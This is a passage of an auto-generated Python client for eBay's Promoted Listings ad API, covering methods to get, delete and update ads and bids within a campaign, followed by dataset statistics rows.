returns the request thread.
"""
all_params = ['ad_id', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_ad" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ad_id' is set
if ('ad_id' not in params or
params['ad_id'] is None):
raise ValueError("Missing the required parameter `ad_id` when calling `delete_ad`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `delete_ad`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ad_id' in params:
path_params['ad_id'] = params['ad_id'] # noqa: E501
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad/{ad_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_ads_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""delete_ads_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method deletes ads using a list of seller-defined inventory reference IDs, used with the Inventory API, that are associated with the specified campaign ID. Specify the campaign ID (as a path parameter) and a list of inventoryReferenceId and inventoryReferenceType pairs to be deleted. Call getCampaigns to get a list of the seller's current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ads_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeleteAdsByInventoryReferenceRequest body: This request object defines the fields for the deleteAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: AdIds
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def delete_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""delete_ads_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method deletes ads using a list of seller-defined inventory reference IDs, used with the Inventory API, that are associated with the specified campaign ID. Specify the campaign ID (as a path parameter) and a list of inventoryReferenceId and inventoryReferenceType pairs to be deleted. Call getCampaigns to get a list of the seller's current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeleteAdsByInventoryReferenceRequest body: This request object defines the fields for the deleteAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: AdIds
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_ads_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `delete_ads_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/delete_ads_by_inventory_reference', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdIds', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ad(self, ad_id, campaign_id, **kwargs): # noqa: E501
"""get_ad # noqa: E501
This method retrieves the specified ad from the specified campaign. In the request, supply the campaign_id and ad_id as path parameters. Call getCampaigns to retrieve a list of the seller's current campaign IDs and call getAds to retrieve their current ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ad(ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ad_id: Identifier of an ad. This ID was generated when the ad was created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: Ad
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ad_with_http_info(ad_id, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.get_ad_with_http_info(ad_id, campaign_id, **kwargs) # noqa: E501
return data
def get_ad_with_http_info(self, ad_id, campaign_id, **kwargs): # noqa: E501
"""get_ad # noqa: E501
This method retrieves the specified ad from the specified campaign. In the request, supply the campaign_id and ad_id as path parameters. Call getCampaigns to retrieve a list of the seller's current campaign IDs and call getAds to retrieve their current ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ad_with_http_info(ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ad_id: Identifier of an ad. This ID was generated when the ad was created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: Ad
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ad_id', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ad" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ad_id' is set
if ('ad_id' not in params or
params['ad_id'] is None):
raise ValueError("Missing the required parameter `ad_id` when calling `get_ad`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `get_ad`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ad_id' in params:
path_params['ad_id'] = params['ad_id'] # noqa: E501
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad/{ad_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Ad', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ads(self, campaign_id, **kwargs): # noqa: E501
"""get_ads # noqa: E501
This method retrieves Promoted Listings ads that are associated with listings created with either the Trading API or the Inventory API. The method retrieves ads related to the specified campaign. Specify the Promoted Listings campaign to target with the campaign_id path parameter. Because of the large number of possible results, you can use query parameters to paginate the result set by specifying a limit, which dictates how many ads to return on each page of the response. You can also specify how many ads to skip in the result set before returning the first result using the offset path parameter. Call getCampaigns to retrieve the current campaign IDs for the seller. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads(campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str limit: Specifies the maximum number of ads to return on a page in the paginated response. Default: 10 Maximum: 500
:param str listing_ids: A comma separated list of listing IDs. The response includes only active ads (ads associated with a RUNNING campaign). The results do not include listing IDs that are excluded by other conditions.
:param str offset: Specifies the number of ads to skip in the result set before returning the first ad in the paginated response. Combine offset with the limit query parameter to control the items returned in the response. For example, if you supply an offset of 0 and a limit of 10, the first page of the response contains the first 10 items from the complete list of items retrieved by the call. If offset is 10 and limit is 20, the first page of the response contains items 11-30 from the complete result set. Default: 0
:return: AdPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ads_with_http_info(campaign_id, **kwargs) # noqa: E501
else:
(data) = self.get_ads_with_http_info(campaign_id, **kwargs) # noqa: E501
return data
def get_ads_with_http_info(self, campaign_id, **kwargs): # noqa: E501
"""get_ads # noqa: E501
This method retrieves Promoted Listings ads that are associated with listings created with either the Trading API or the Inventory API. The method retrieves ads related to the specified campaign. Specify the Promoted Listings campaign to target with the campaign_id path parameter. Because of the large number of possible results, you can use query parameters to paginate the result set by specifying a limit, which dictates how many ads to return on each page of the response. You can also specify how many ads to skip in the result set before returning the first result using the offset path parameter. Call getCampaigns to retrieve the current campaign IDs for the seller. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads_with_http_info(campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str limit: Specifies the maximum number of ads to return on a page in the paginated response. Default: 10 Maximum: 500
:param str listing_ids: A comma separated list of listing IDs. The response includes only active ads (ads associated with a RUNNING campaign). The results do not include listing IDs that are excluded by other conditions.
:param str offset: Specifies the number of ads to skip in the result set before returning the first ad in the paginated response. Combine offset with the limit query parameter to control the items returned in the response. For example, if you supply an offset of 0 and a limit of 10, the first page of the response contains the first 10 items from the complete list of items retrieved by the call. If offset is 10 and limit is 20, the first page of the response contains items 11-30 from the complete result set. Default: 0
:return: AdPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['campaign_id', 'limit', 'listing_ids', 'offset'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ads" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `get_ads`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'listing_ids' in params:
query_params.append(('listing_ids', params['listing_ids'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdPagedCollection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ads_by_inventory_reference(self, campaign_id, inventory_reference_id, inventory_reference_type, **kwargs): # noqa: E501
"""get_ads_by_inventory_reference # noqa: E501
This method retrieves Promoted Listings ads associated with listings that are managed with the Inventory API from the specified campaign. Supply the campaign_id as a path parameter and use query parameters to specify the inventory_reference_id and inventory_reference_type pairs. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for an inventory item group, which is an entity that's used in the Inventory API to create a multiple-variation listing). To indicate a listing managed by the Inventory API, you must always specify both an inventory_reference_id and the associated inventory_reference_type. Call getCampaigns to retrieve all of the seller's the current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads_by_inventory_reference(campaign_id, inventory_reference_id, inventory_reference_type, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str inventory_reference_id: The inventory reference ID associated with the ad you want returned. A seller's inventory reference ID is the ID of either a listing or the ID of an inventory item group (the parent of a multi-variation listing, such as a shirt that is available in multiple sizes and colors). You must always supply in both an inventory_reference_id and an inventory_reference_type. (required)
:param str inventory_reference_type: The type of the inventory reference ID. Set this value to either INVENTORY_ITEM (a single listing) or INVENTORY_ITEM_GROUP (a multi-variation listing). You must always pass in both an inventory_reference_id and an inventory_reference_type. (required)
:return: Ads
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ads_by_inventory_reference_with_http_info(campaign_id, inventory_reference_id, inventory_reference_type, **kwargs) # noqa: E501
else:
(data) = self.get_ads_by_inventory_reference_with_http_info(campaign_id, inventory_reference_id, inventory_reference_type, **kwargs) # noqa: E501
return data
def get_ads_by_inventory_reference_with_http_info(self, campaign_id, inventory_reference_id, inventory_reference_type, **kwargs): # noqa: E501
"""get_ads_by_inventory_reference # noqa: E501
This method retrieves Promoted Listings ads associated with listings that are managed with the Inventory API from the specified campaign. Supply the campaign_id as a path parameter and use query parameters to specify the inventory_reference_id and inventory_reference_type pairs. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for an inventory item group, which is an entity that's used in the Inventory API to create a multiple-variation listing). To indicate a listing managed by the Inventory API, you must always specify both an inventory_reference_id and the associated inventory_reference_type. Call getCampaigns to retrieve all of the seller's the current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads_by_inventory_reference_with_http_info(campaign_id, inventory_reference_id, inventory_reference_type, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str inventory_reference_id: The inventory reference ID associated with the ad you want returned. A seller's inventory reference ID is the ID of either a listing or the ID of an inventory item group (the parent of a multi-variation listing, such as a shirt that is available in multiple sizes and colors). You must always supply in both an inventory_reference_id and an inventory_reference_type. (required)
:param str inventory_reference_type: The type of the inventory reference ID. Set this value to either INVENTORY_ITEM (a single listing) or INVENTORY_ITEM_GROUP (a multi-variation listing). You must always pass in both an inventory_reference_id and an inventory_reference_type. (required)
:return: Ads
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['campaign_id', 'inventory_reference_id', 'inventory_reference_type'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ads_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `get_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'inventory_reference_id' is set
if ('inventory_reference_id' not in params or
params['inventory_reference_id'] is None):
raise ValueError("Missing the required parameter `inventory_reference_id` when calling `get_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'inventory_reference_type' is set
if ('inventory_reference_type' not in params or
params['inventory_reference_type'] is None):
raise ValueError("Missing the required parameter `inventory_reference_type` when calling `get_ads_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
if 'inventory_reference_id' in params:
query_params.append(('inventory_reference_id', params['inventory_reference_id'])) # noqa: E501
if 'inventory_reference_type' in params:
query_params.append(('inventory_reference_type', params['inventory_reference_type'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/get_ads_by_inventory_reference', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Ads', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_bid(self, body, ad_id, campaign_id, **kwargs): # noqa: E501
"""update_bid # noqa: E501
This method updates the bid percentage (also known as the "ad rate") for the specified ad in the specified campaign. In the request, supply the campaign_id and ad_id as path parameters, and supply the new bidPercentage value in the payload of the call. Call getCampaigns to retrieve a seller's current campaign IDs and call getAds to get their ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bid(body, ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UpdateBidPercentageRequest body: This type defines the fields for the updateBid request. (required)
:param str ad_id: A unique eBay-assigned ID for an ad that's generated when an ad is created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_bid_with_http_info(body, ad_id, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.update_bid_with_http_info(body, ad_id, campaign_id, **kwargs) # noqa: E501
return data
def update_bid_with_http_info(self, body, ad_id, campaign_id, **kwargs): # noqa: E501
"""update_bid # noqa: E501
This method updates the bid percentage (also known as the "ad rate") for the specified ad in the specified campaign. In the request, supply the campaign_id and ad_id as path parameters, and supply the new bidPercentage value in the payload of the call. Call getCampaigns to retrieve a seller's current campaign IDs and call getAds to get their ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bid_with_http_info(body, ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UpdateBidPercentageRequest body: This type defines the fields for the updateBid request. (required)
:param str ad_id: A unique eBay-assigned ID for an ad that's generated when an ad is created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'ad_id', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_bid" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_bid`") # noqa: E501
# verify the required parameter 'ad_id' is set
if ('ad_id' not in params or
params['ad_id'] is None):
raise ValueError("Missing the required parameter `ad_id` when calling `update_bid`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `update_bid`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ad_id' in params:
path_params['ad_id'] = params['ad_id'] # noqa: E501
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad/{ad_id}/update_bid', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 60.22055
| 2,092
| 0.681396
| 12,291
| 92,017
| 4.91091
| 0.033358
| 0.044069
| 0.024188
| 0.023244
| 0.963999
| 0.960752
| 0.95999
| 0.955368
| 0.953612
| 0.951243
| 0
| 0.011803
| 0.248661
| 92,017
| 1,527
| 2,093
| 60.259987
| 0.861259
| 0.522175
| 0
| 0.806954
| 0
| 0
| 0.223073
| 0.077491
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034772
| false
| 0
| 0.004796
| 0
| 0.091127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.